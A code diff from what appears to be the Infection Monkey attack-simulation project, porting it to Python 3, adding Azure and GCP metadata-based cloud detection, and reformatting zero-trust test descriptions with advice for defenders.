logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
@ -84,5 +83,5 @@ class AwsService(object):
filtered_instances_data = filter_instance_data_from_aws_response(response) filtered_instances_data = filter_instance_data_from_aws_response(response)
return filtered_instances_data return filtered_instances_data
except botocore.exceptions.ClientError as e: except botocore.exceptions.ClientError as e:
logger.warning("AWS client error while trying to get instances: " + e.message) logger.warning("AWS client error while trying to get instances: " + e)
raise e raise e

View File

@ -1,9 +1,8 @@
from unittest import TestCase from unittest import TestCase
from aws_service import filter_instance_data_from_aws_response from .aws_service import filter_instance_data_from_aws_response
import json import json
__author__ = 'shay.nehmad' __author__ = 'shay.nehmad'
@ -11,14 +10,14 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
def test_filter_instance_data_from_aws_response(self): def test_filter_instance_data_from_aws_response(self):
json_response_full = """ json_response_full = """
{ {
"InstanceInformationList": [ "InstanceInformationList": [
{ {
"ActivationId": "string", "ActivationId": "string",
"AgentVersion": "string", "AgentVersion": "string",
"AssociationOverview": { "AssociationOverview": {
"DetailedStatus": "string", "DetailedStatus": "string",
"InstanceAssociationStatusAggregatedCount": { "InstanceAssociationStatusAggregatedCount": {
"string" : 6 "string" : 6
} }
}, },
"AssociationStatus": "string", "AssociationStatus": "string",
@ -53,7 +52,7 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
self.assertEqual(filter_instance_data_from_aws_response(json.loads(json_response_empty)), []) self.assertEqual(filter_instance_data_from_aws_response(json.loads(json_response_empty)), [])
self.assertEqual( self.assertEqual(
filter_instance_data_from_aws_response(json.loads(json_response_full)), filter_instance_data_from_aws_response(json.loads(json_response_full)),
[{'instance_id': u'string', [{'instance_id': 'string',
'ip_address': u'string', 'ip_address': 'string',
'name': u'string', 'name': 'string',
'os': u'string'}]) 'os': 'string'}])

View File

View File

@ -0,0 +1,55 @@
import logging
import requests
from common.cloud.environment_names import Environment
from common.cloud.instance import CloudInstance
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
logger = logging.getLogger(__name__)
class AzureInstance(CloudInstance):
"""
Access to useful information about the current machine if it's an Azure VM.
Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
"""
def is_instance(self):
return self.on_azure
def get_cloud_provider_name(self) -> Environment:
return Environment.AZURE
def __init__(self):
"""
Determines if on Azure and if so, gets some basic metadata on this instance.
"""
self.instance_name = None
self.instance_id = None
self.location = None
self.on_azure = False
try:
response = requests.get(AZURE_METADATA_SERVICE_URL, headers={"Metadata": "true"})
self.on_azure = True
# If not on cloud, the metadata URL is non-routable and the connection will fail.
# If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
if response:
logger.debug("On Azure. Trying to parse metadata.")
self.try_parse_response(response)
else:
logger.warning("On Azure, but metadata response not ok: {}".format(response.status_code))
except requests.RequestException:
logger.debug("Failed to get response from Azure metadata service: This instance is not on Azure.")
self.on_azure = False
def try_parse_response(self, response):
try:
response_data = response.json()
self.instance_name = response_data["compute"]["name"]
self.instance_id = response_data["compute"]["vmId"]
self.location = response_data["compute"]["location"]
except KeyError:
logger.exception("Error while parsing response from Azure metadata service.")

View File

@ -0,0 +1,15 @@
from enum import Enum
class Environment(Enum):
UNKNOWN = "Unknown"
ON_PREMISE = "On Premise"
AZURE = "Azure"
AWS = "AWS"
GCP = "GCP"
ALIBABA = "Alibaba Cloud"
IBM = "IBM Cloud"
DigitalOcean = "Digital Ocean"
ALL_ENVIRONMENTS_NAMES = [x.value for x in Environment]

View File

View File

@ -0,0 +1,43 @@
import logging
import requests
from common.cloud.environment_names import Environment
from common.cloud.instance import CloudInstance
logger = logging.getLogger(__name__)
GCP_METADATA_SERVICE_URL = "http://metadata.google.internal/"
class GcpInstance(CloudInstance):
"""
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
"""
def is_instance(self):
return self.on_gcp
def get_cloud_provider_name(self) -> Environment:
return Environment.GCP
def __init__(self):
self.on_gcp = False
try:
# If not on GCP, this domain shouldn't resolve.
response = requests.get(GCP_METADATA_SERVICE_URL)
if response:
logger.debug("Got ok metadata response: on GCP")
self.on_gcp = True
if "Metadata-Flavor" not in response.headers:
logger.warning("Got unexpected GCP Metadata format")
else:
if not response.headers["Metadata-Flavor"] == "Google":
logger.warning("Got unexpected Metadata flavor: {}".format(response.headers["Metadata-Flavor"]))
else:
logger.warning("On GCP, but metadata response not ok: {}".format(response.status_code))
except requests.RequestException:
logger.debug("Failed to get response from GCP metadata service: This instance is not on GCP")
self.on_gcp = False

View File

@ -0,0 +1,14 @@
from common.cloud.environment_names import Environment
class CloudInstance(object):
"""
This is an abstract class which represents a cloud instance.
The current machine can be a cloud instance (for example EC2 instance or Azure VM).
"""
def is_instance(self) -> bool:
raise NotImplementedError()
def get_cloud_provider_name(self) -> Environment:
raise NotImplementedError()

View File

@ -1,6 +1,5 @@
from common.cmd.cmd_result import CmdResult from common.cmd.cmd_result import CmdResult
__author__ = 'itay.mizeretz' __author__ = 'itay.mizeretz'
@ -11,8 +10,8 @@ class AwsCmdResult(CmdResult):
def __init__(self, command_info): def __init__(self, command_info):
super(AwsCmdResult, self).__init__( super(AwsCmdResult, self).__init__(
self.is_successful(command_info, True), command_info[u'ResponseCode'], command_info[u'StandardOutputContent'], self.is_successful(command_info, True), command_info['ResponseCode'], command_info['StandardOutputContent'],
command_info[u'StandardErrorContent']) command_info['StandardErrorContent'])
self.command_info = command_info self.command_info = command_info
@staticmethod @staticmethod
@ -23,4 +22,4 @@ class AwsCmdResult(CmdResult):
:param is_timeout: Whether the given command timed out :param is_timeout: Whether the given command timed out
:return: True if successful, False otherwise. :return: True if successful, False otherwise.
""" """
return (command_info[u'Status'] == u'Success') or (is_timeout and (command_info[u'Status'] == u'InProgress')) return (command_info['Status'] == 'Success') or (is_timeout and (command_info['Status'] == 'InProgress'))

View File

@ -1,6 +1,6 @@
import logging import logging
from common.cloud.aws_service import AwsService from common.cloud.aws.aws_service import AwsService
from common.cmd.aws.aws_cmd_result import AwsCmdResult from common.cmd.aws.aws_cmd_result import AwsCmdResult
from common.cmd.cmd_runner import CmdRunner from common.cmd.cmd_runner import CmdRunner
from common.cmd.cmd_status import CmdStatus from common.cmd.cmd_status import CmdStatus
@ -15,7 +15,7 @@ class AwsCmdRunner(CmdRunner):
Class for running commands on a remote AWS machine Class for running commands on a remote AWS machine
""" """
def __init__(self, is_linux, instance_id, region = None): def __init__(self, is_linux, instance_id, region=None):
super(AwsCmdRunner, self).__init__(is_linux) super(AwsCmdRunner, self).__init__(is_linux)
self.instance_id = instance_id self.instance_id = instance_id
self.region = region self.region = region
@ -28,9 +28,9 @@ class AwsCmdRunner(CmdRunner):
return AwsCmdResult(command_info) return AwsCmdResult(command_info)
def get_command_status(self, command_info): def get_command_status(self, command_info):
if command_info[u'Status'] == u'InProgress': if command_info['Status'] == 'InProgress':
return CmdStatus.IN_PROGRESS return CmdStatus.IN_PROGRESS
elif command_info[u'Status'] == u'Success': elif command_info['Status'] == 'Success':
return CmdStatus.SUCCESS return CmdStatus.SUCCESS
else: else:
return CmdStatus.FAILURE return CmdStatus.FAILURE

View File

@ -61,7 +61,7 @@ class CmdRunner(object):
command_instance_dict[command] = instance command_instance_dict[command] = instance
instance_results = {} instance_results = {}
command_result_pairs = CmdRunner.wait_commands(command_instance_dict.keys()) command_result_pairs = CmdRunner.wait_commands(list(command_instance_dict.keys()))
for command, result in command_result_pairs: for command, result in command_result_pairs:
instance = command_instance_dict[command] instance = command_instance_dict[command]
instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result) instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result)

View File

@ -1,2 +1,3 @@
from zero_trust_consts import populate_mappings from .zero_trust_consts import populate_mappings
populate_mappings() populate_mappings()

View File

@ -1,2 +1 @@
ES_SERVICE = 'elastic-search-9200' ES_SERVICE = 'elastic-search-9200'

View File

@ -0,0 +1,4 @@
AWS_COLLECTOR = "AwsCollector"
HOSTNAME_COLLECTOR = "HostnameCollector"
ENVIRONMENT_COLLECTOR = "EnvironmentCollector"
PROCESS_LIST_COLLECTOR = "ProcessListCollector"

View File

@ -6,31 +6,31 @@ This file contains static mappings between zero trust components such as: pillar
Some of the mappings are computed when this module is loaded. Some of the mappings are computed when this module is loaded.
""" """
AUTOMATION_ORCHESTRATION = u"Automation & Orchestration" AUTOMATION_ORCHESTRATION = "Automation & Orchestration"
VISIBILITY_ANALYTICS = u"Visibility & Analytics" VISIBILITY_ANALYTICS = "Visibility & Analytics"
WORKLOADS = u"Workloads" WORKLOADS = "Workloads"
DEVICES = u"Devices" DEVICES = "Devices"
NETWORKS = u"Networks" NETWORKS = "Networks"
PEOPLE = u"People" PEOPLE = "People"
DATA = u"Data" DATA = "Data"
PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION) PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION)
STATUS_UNEXECUTED = u"Unexecuted" STATUS_UNEXECUTED = "Unexecuted"
STATUS_PASSED = u"Passed" STATUS_PASSED = "Passed"
STATUS_VERIFY = u"Verify" STATUS_VERIFY = "Verify"
STATUS_FAILED = u"Failed" STATUS_FAILED = "Failed"
# Don't change order! The statuses are ordered by importance/severity. # Don't change order! The statuses are ordered by importance/severity.
ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED] ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED]
TEST_DATA_ENDPOINT_ELASTIC = u"unencrypted_data_endpoint_elastic" TEST_DATA_ENDPOINT_ELASTIC = "unencrypted_data_endpoint_elastic"
TEST_DATA_ENDPOINT_HTTP = u"unencrypted_data_endpoint_http" TEST_DATA_ENDPOINT_HTTP = "unencrypted_data_endpoint_http"
TEST_MACHINE_EXPLOITED = u"machine_exploited" TEST_MACHINE_EXPLOITED = "machine_exploited"
TEST_ENDPOINT_SECURITY_EXISTS = u"endpoint_security_exists" TEST_ENDPOINT_SECURITY_EXISTS = "endpoint_security_exists"
TEST_SCHEDULED_EXECUTION = u"scheduled_execution" TEST_SCHEDULED_EXECUTION = "scheduled_execution"
TEST_MALICIOUS_ACTIVITY_TIMELINE = u"malicious_activity_timeline" TEST_MALICIOUS_ACTIVITY_TIMELINE = "malicious_activity_timeline"
TEST_SEGMENTATION = u"segmentation" TEST_SEGMENTATION = "segmentation"
TEST_TUNNELING = u"tunneling" TEST_TUNNELING = "tunneling"
TEST_COMMUNICATE_AS_NEW_USER = u"communicate_as_new_user" TEST_COMMUNICATE_AS_NEW_USER = "communicate_as_new_user"
TESTS = ( TESTS = (
TEST_SEGMENTATION, TEST_SEGMENTATION,
TEST_MALICIOUS_ACTIVITY_TIMELINE, TEST_MALICIOUS_ACTIVITY_TIMELINE,
@ -43,32 +43,33 @@ TESTS = (
TEST_COMMUNICATE_AS_NEW_USER TEST_COMMUNICATE_AS_NEW_USER
) )
PRINCIPLE_DATA_TRANSIT = u"data_transit" PRINCIPLE_DATA_TRANSIT = "data_transit"
PRINCIPLE_ENDPOINT_SECURITY = u"endpoint_security" PRINCIPLE_ENDPOINT_SECURITY = "endpoint_security"
PRINCIPLE_USER_BEHAVIOUR = u"user_behaviour" PRINCIPLE_USER_BEHAVIOUR = "user_behaviour"
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = u"analyze_network_traffic" PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = "analyze_network_traffic"
PRINCIPLE_SEGMENTATION = u"segmentation" PRINCIPLE_SEGMENTATION = "segmentation"
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = u"network_policies" PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = "network_policies"
PRINCIPLE_USERS_MAC_POLICIES = u"users_mac_policies" PRINCIPLE_USERS_MAC_POLICIES = "users_mac_policies"
PRINCIPLES = { PRINCIPLES = {
PRINCIPLE_SEGMENTATION: u"Apply segmentation and micro-segmentation inside your network.", PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: u"Analyze network traffic for malicious activity.", PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: "Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR: u"Adopt security user behavior analytics.", PRINCIPLE_USER_BEHAVIOUR: "Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY: u"Use anti-virus and other traditional endpoint security solutions.", PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint security solutions.",
PRINCIPLE_DATA_TRANSIT: u"Secure data at transit by encrypting it.", PRINCIPLE_DATA_TRANSIT: "Secure data at transit by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: u"Configure network policies to be as restrictive as possible.", PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
PRINCIPLE_USERS_MAC_POLICIES: u"Users' permissions to the network and to resources should be MAC (Mandetory " PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandetory "
u"Access Control) only.", "Access Control) only.",
} }
POSSIBLE_STATUSES_KEY = u"possible_statuses" POSSIBLE_STATUSES_KEY = "possible_statuses"
PILLARS_KEY = u"pillars" PILLARS_KEY = "pillars"
PRINCIPLE_KEY = u"principle_key" PRINCIPLE_KEY = "principle_key"
FINDING_EXPLANATION_BY_STATUS_KEY = u"finding_explanation" FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = u"explanation" TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = { TESTS_MAP = {
TEST_SEGMENTATION: { TEST_SEGMENTATION: {
TEST_EXPLANATION_KEY: u"The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.", TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
"running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY: { FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.", STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs." STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
@ -78,7 +79,8 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED] POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
}, },
TEST_MALICIOUS_ACTIVITY_TIMELINE: { TEST_MALICIOUS_ACTIVITY_TIMELINE: {
TEST_EXPLANATION_KEY: u"The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.", TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
"exploitation.",
FINDING_EXPLANATION_BY_STATUS_KEY: { FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts." STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
}, },
@ -87,19 +89,22 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY] POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
}, },
TEST_ENDPOINT_SECURITY_EXISTS: { TEST_ENDPOINT_SECURITY_EXISTS: {
TEST_EXPLANATION_KEY: u"The Monkey checked if there is an active process of an endpoint security software.", TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY: { FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.", STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern." "software on endpoints.",
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
"security concern. "
}, },
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES], PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
}, },
TEST_MACHINE_EXPLOITED: { TEST_MACHINE_EXPLOITED: {
TEST_EXPLANATION_KEY: u"The Monkey tries to exploit machines in order to breach them and propagate in the network.", TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY: { FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.", STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
"which endpoints were compromised.",
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint." STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
}, },
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
@ -109,7 +114,8 @@ TESTS_MAP = {
TEST_SCHEDULED_EXECUTION: { TEST_SCHEDULED_EXECUTION: {
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.", TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY: { FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.", STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
"software.",
STATUS_PASSED: "Monkey failed to execute in a scheduled manner." STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
}, },
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR, PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
@ -117,38 +123,42 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY] POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
}, },
TEST_DATA_ENDPOINT_ELASTIC: { TEST_DATA_ENDPOINT_ELASTIC: {
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to ElasticSearch instances.", TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY: { FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.", STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them." STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
"that indicate attempts to access them. "
}, },
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT, PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
PILLARS_KEY: [DATA], PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
}, },
TEST_DATA_ENDPOINT_HTTP: { TEST_DATA_ENDPOINT_HTTP: {
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to HTTP servers.", TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: { FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.", STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them." STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
"attempts to access them. "
}, },
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT, PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
PILLARS_KEY: [DATA], PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
}, },
TEST_TUNNELING: { TEST_TUNNELING: {
TEST_EXPLANATION_KEY: u"The Monkey tried to tunnel traffic using other monkeys.", TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY: { FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them." STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
"restrict them. "
}, },
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS], PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED] POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
}, },
TEST_COMMUNICATE_AS_NEW_USER: { TEST_COMMUNICATE_AS_NEW_USER: {
TEST_EXPLANATION_KEY: u"The Monkey tried to create a new user and communicate with the internet from it.", TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY: { FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.", STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
"restrict them to MAC only.",
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network." STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
}, },
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES, PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
@ -184,7 +194,7 @@ def populate_mappings():
def populate_pillars_to_tests(): def populate_pillars_to_tests():
for pillar in PILLARS: for pillar in PILLARS:
for test, test_info in TESTS_MAP.items(): for test, test_info in list(TESTS_MAP.items()):
if pillar in test_info[PILLARS_KEY]: if pillar in test_info[PILLARS_KEY]:
PILLARS_TO_TESTS[pillar].append(test) PILLARS_TO_TESTS[pillar].append(test)
@ -192,12 +202,12 @@ def populate_pillars_to_tests():
def populate_principles_to_tests(): def populate_principles_to_tests():
for single_principle in PRINCIPLES: for single_principle in PRINCIPLES:
PRINCIPLES_TO_TESTS[single_principle] = [] PRINCIPLES_TO_TESTS[single_principle] = []
for test, test_info in TESTS_MAP.items(): for test, test_info in list(TESTS_MAP.items()):
PRINCIPLES_TO_TESTS[test_info[PRINCIPLE_KEY]].append(test) PRINCIPLES_TO_TESTS[test_info[PRINCIPLE_KEY]].append(test)
def populate_principles_to_pillars(): def populate_principles_to_pillars():
for principle, principle_tests in PRINCIPLES_TO_TESTS.items(): for principle, principle_tests in list(PRINCIPLES_TO_TESTS.items()):
principles_pillars = set() principles_pillars = set()
for test in principle_tests: for test in principle_tests:
for pillar in TESTS_MAP[test][PILLARS_KEY]: for pillar in TESTS_MAP[test][PILLARS_KEY]:

View File

@ -4,7 +4,6 @@ import struct
from abc import ABCMeta, abstractmethod from abc import ABCMeta, abstractmethod
import ipaddress import ipaddress
from six import text_type
import logging import logging
__author__ = 'itamar' __author__ = 'itamar'
@ -12,9 +11,7 @@ __author__ = 'itamar'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
class NetworkRange(object): class NetworkRange(object, metaclass=ABCMeta):
__metaclass__ = ABCMeta
def __init__(self, shuffle=True): def __init__(self, shuffle=True):
self._shuffle = shuffle self._shuffle = shuffle
@ -47,9 +44,9 @@ class NetworkRange(object):
@staticmethod @staticmethod
def get_range_obj(address_str): def get_range_obj(address_str):
address_str = address_str.strip()
if not address_str: # Empty string if not address_str: # Empty string
return None return None
address_str = address_str.strip()
if NetworkRange.check_if_range(address_str): if NetworkRange.check_if_range(address_str):
return IpRange(ip_range=address_str) return IpRange(ip_range=address_str)
if -1 != address_str.find('/'): if -1 != address_str.find('/'):
@ -62,7 +59,7 @@ class NetworkRange(object):
ips = address_str.split('-') ips = address_str.split('-')
try: try:
ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1]) ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1])
except ValueError as e: except ValueError:
return False return False
return True return True
return False return False
@ -80,7 +77,7 @@ class CidrRange(NetworkRange):
def __init__(self, cidr_range, shuffle=True): def __init__(self, cidr_range, shuffle=True):
super(CidrRange, self).__init__(shuffle=shuffle) super(CidrRange, self).__init__(shuffle=shuffle)
self._cidr_range = cidr_range.strip() self._cidr_range = cidr_range.strip()
self._ip_network = ipaddress.ip_network(text_type(self._cidr_range), strict=False) self._ip_network = ipaddress.ip_network(str(self._cidr_range), strict=False)
def __repr__(self): def __repr__(self):
return "<CidrRange %s>" % (self._cidr_range,) return "<CidrRange %s>" % (self._cidr_range,)
@ -119,7 +116,7 @@ class IpRange(NetworkRange):
return self._lower_end_ip_num <= self._ip_to_number(ip_address) <= self._higher_end_ip_num return self._lower_end_ip_num <= self._ip_to_number(ip_address) <= self._higher_end_ip_num
def _get_range(self): def _get_range(self):
return range(self._lower_end_ip_num, self._higher_end_ip_num + 1) return list(range(self._lower_end_ip_num, self._higher_end_ip_num + 1))
class SingleIpRange(NetworkRange): class SingleIpRange(NetworkRange):
@ -153,30 +150,26 @@ class SingleIpRange(NetworkRange):
return self._ip_address return self._ip_address
@staticmethod @staticmethod
def string_to_host(string): def string_to_host(string_):
""" """
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
:param string: String that was entered in "Scan IP/subnet list" :param string_: String that was entered in "Scan IP/subnet list"
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com) :return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
""" """
# The most common use case is to enter ip/range into "Scan IP/subnet list" # The most common use case is to enter ip/range into "Scan IP/subnet list"
domain_name = '' domain_name = ''
# Make sure to have unicode string
user_input = string.decode('utf-8', 'ignore')
# Try casting user's input as IP # Try casting user's input as IP
try: try:
ip = ipaddress.ip_address(user_input).exploded ip = ipaddress.ip_address(string_).exploded
except ValueError: except ValueError:
# Exception means that it's a domain name # Exception means that it's a domain name
try: try:
ip = socket.gethostbyname(string) ip = socket.gethostbyname(string_)
domain_name = string domain_name = string_
except socket.error: except socket.error:
LOG.error("Your specified host: {} is not found as a domain name and" LOG.error("Your specified host: {} is not found as a domain name and"
" it's not an IP address".format(string)) " it's not an IP address".format(string_))
return None, string return None, string_
# If a string was entered instead of IP we presume that it was domain name and translate it # If a string_ was entered instead of IP we presume that it was domain name and translate it
return ip, domain_name return ip, domain_name

View File

@ -1,4 +1,4 @@
from common.network.network_range import * from common.network.network_range import CidrRange
from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
from monkey_island.cc.testing.IslandTestCase import IslandTestCase from monkey_island.cc.testing.IslandTestCase import IslandTestCase
@ -11,20 +11,20 @@ class TestSegmentationUtils(IslandTestCase):
# IP not in both # IP not in both
self.assertIsNone(get_ip_in_src_and_not_in_dst( self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("3.3.3.3"), text_type("4.4.4.4")], source, target ["3.3.3.3", "4.4.4.4"], source, target
)) ))
# IP not in source, in target # IP not in source, in target
self.assertIsNone(get_ip_in_src_and_not_in_dst( self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("2.2.2.2")], source, target ["2.2.2.2"], source, target
)) ))
# IP in source, not in target # IP in source, not in target
self.assertIsNotNone(get_ip_in_src_and_not_in_dst( self.assertIsNotNone(get_ip_in_src_and_not_in_dst(
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, target ["8.8.8.8", "1.1.1.1"], source, target
)) ))
# IP in both subnets # IP in both subnets
self.assertIsNone(get_ip_in_src_and_not_in_dst( self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, source ["8.8.8.8", "1.1.1.1"], source, source
)) ))

View File

@ -1,10 +1,10 @@
# abstract, static method decorator # abstract, static method decorator
# noinspection PyPep8Naming
